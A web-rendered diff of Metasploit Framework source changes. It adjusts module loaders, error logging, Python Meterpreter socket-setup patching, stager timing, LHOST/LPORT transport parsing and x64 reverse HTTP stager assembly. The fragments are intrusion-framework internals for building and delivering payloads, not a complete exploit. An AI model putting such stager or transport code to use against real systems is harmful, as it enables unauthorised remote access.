meta[:description] = mod.meta['description'].dump
|
||||
meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ")
|
||||
meta[:license] = mod.meta['license'].nil? ? 'MSF_LICENSE' : mod.meta['license']
|
||||
|
||||
options = if drop_rhost
|
||||
mod.meta['options'].reject {|n, o| n == 'rhost'}
|
||||
|
|
|
@ -4,4 +4,4 @@
|
|||
[
|
||||
<%= meta[:authors] %>
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'License' => <%= meta[:license] %>,
|
||||
|
|
|
@ -471,6 +471,12 @@ class Msf::Modules::Loader::Base
|
|||
module_path
|
||||
end
|
||||
|
||||
def script_path?(path)
|
||||
File.executable?(path) &&
|
||||
!File.directory?(path) &&
|
||||
File.read(path, 2) == "#!"
|
||||
end
|
||||
|
||||
# Changes a file name path to a canonical module reference name.
|
||||
#
|
||||
# @param [String] path Relative path to module.
|
||||
|
|
|
@ -38,12 +38,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
|
|||
|
||||
# Try to load modules from all the files in the supplied path
|
||||
Rex::Find.find(full_entry_path) do |entry_descendant_path|
|
||||
if module_path?(entry_descendant_path)
|
||||
if module_path?(entry_descendant_path) && !script_path?(entry_descendant_path)
|
||||
entry_descendant_pathname = Pathname.new(entry_descendant_path)
|
||||
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
|
||||
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
|
||||
next if File::basename(relative_entry_descendant_path) == "example.rb"
|
||||
|
||||
# The module_reference_name doesn't have a file extension
|
||||
module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
|
||||
|
||||
|
|
|
@ -40,7 +40,9 @@ class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
|
|||
|
||||
# Try to load modules from all the files in the supplied path
|
||||
Rex::Find.find(full_entry_path) do |entry_descendant_path|
|
||||
if File.executable?(entry_descendant_path) && !File.directory?(entry_descendant_path)
|
||||
# Assume that all modules are scripts for now, workaround
|
||||
# filesystems where all files are labeled as executable.
|
||||
if script_path?(entry_descendant_path)
|
||||
entry_descendant_pathname = Pathname.new(entry_descendant_path)
|
||||
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
|
||||
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
|
||||
|
@ -85,7 +87,7 @@ class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
|
|||
begin
|
||||
Msf::Modules::External::Shim.generate(full_path)
|
||||
rescue ::Exception => e
|
||||
elog "Unable to load module #{full_path} #{e.class} #{e}"
|
||||
elog "Unable to load module #{full_path} #{e.class} #{e} #{e.backtrace.join "\n"}"
|
||||
# XXX migrate this to a full load_error when we can tell the user why the
|
||||
# module did not load and/or how to resolve it.
|
||||
# load_error(full_path, e)
|
||||
|
|
|
@ -130,11 +130,13 @@ module Payload::Python::MeterpreterLoader
|
|||
|
||||
# patch in any optional stageless tcp socket setup
|
||||
unless opts[:stageless_tcp_socket_setup].nil?
|
||||
offset_string = ""
|
||||
/(?<offset_string>\s+)# PATCH-SETUP-STAGELESS-TCP-SOCKET #/ =~ met
|
||||
socket_setup = opts[:stageless_tcp_socket_setup]
|
||||
socket_setup = socket_setup.split("\n")
|
||||
socket_setup.map! {|line| " #{line}\n"}
|
||||
socket_setup.map! {|line| "#{offset_string}#{line}\n"}
|
||||
socket_setup = socket_setup.join
|
||||
met.sub!(" # PATCH-SETUP-STAGELESS-TCP-SOCKET #", socket_setup)
|
||||
met.sub!("#{offset_string}# PATCH-SETUP-STAGELESS-TCP-SOCKET #", socket_setup)
|
||||
end
|
||||
|
||||
met
|
||||
|
|
|
@ -215,15 +215,6 @@ module Msf::Payload::Stager
|
|||
conn.put(p)
|
||||
end
|
||||
|
||||
# If the stage implements the handle connection method, sleep before
|
||||
# handling it.
|
||||
if (derived_implementor?(Msf::Payload::Stager, 'handle_connection_stage'))
|
||||
print_status("Sleeping before handling stage...")
|
||||
|
||||
# Sleep before processing the stage
|
||||
Rex::ThreadSafe.sleep(1.5)
|
||||
end
|
||||
|
||||
# Give the stages a chance to handle the connection
|
||||
handle_connection_stage(conn, opts)
|
||||
end
|
||||
|
|
|
@ -51,9 +51,16 @@ module Msf::Payload::TransportConfig
|
|||
|
||||
def transport_uri_components(opts={})
|
||||
ds = opts[:datastore] || datastore
|
||||
scheme = opts[:scheme]
|
||||
lhost = ds['LHOST']
|
||||
lport = ds['LPORT']
|
||||
if opts[:url]
|
||||
u = URI(opts[:url])
|
||||
scheme = u.scheme
|
||||
lhost = u.host
|
||||
lport = u.port
|
||||
else
|
||||
scheme = opts[:scheme]
|
||||
lhost = ds['LHOST']
|
||||
lport = ds['LPORT']
|
||||
end
|
||||
if ds['OverrideRequestHost']
|
||||
scheme = ds['OverrideScheme'] || scheme
|
||||
lhost = ds['OverrideLHOST'] || lhost
|
||||
|
|
|
@ -481,7 +481,6 @@ module Payload::Windows::ReverseHttp_x64
|
|||
test eax, eax ; are we done?
|
||||
jnz download_more ; keep going
|
||||
pop rax ; clear up reserved space
|
||||
pop rax ; realign again
|
||||
|
||||
execute_stage:
|
||||
ret ; return to the stored stage address
|
||||
|
|
|
@ -602,7 +602,6 @@ module Payload::Windows::ReverseWinHttp_x64
|
|||
test eax, eax ; are we done?
|
||||
jnz download_more ; keep going
|
||||
pop rax ; clear up reserved space
|
||||
pop rax ; realign again
|
||||
|
||||
execute_stage:
|
||||
ret ; return to the stored stage address
|
||||
|
|
|
@ -2,5 +2,6 @@
|
|||
module Msf::Post::Linux
|
||||
require 'msf/core/post/linux/priv'
|
||||
require 'msf/core/post/linux/system'
|
||||
require 'msf/core/post/linux/kernel'
|
||||
require 'msf/core/post/linux/busy_box'
|
||||
end
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue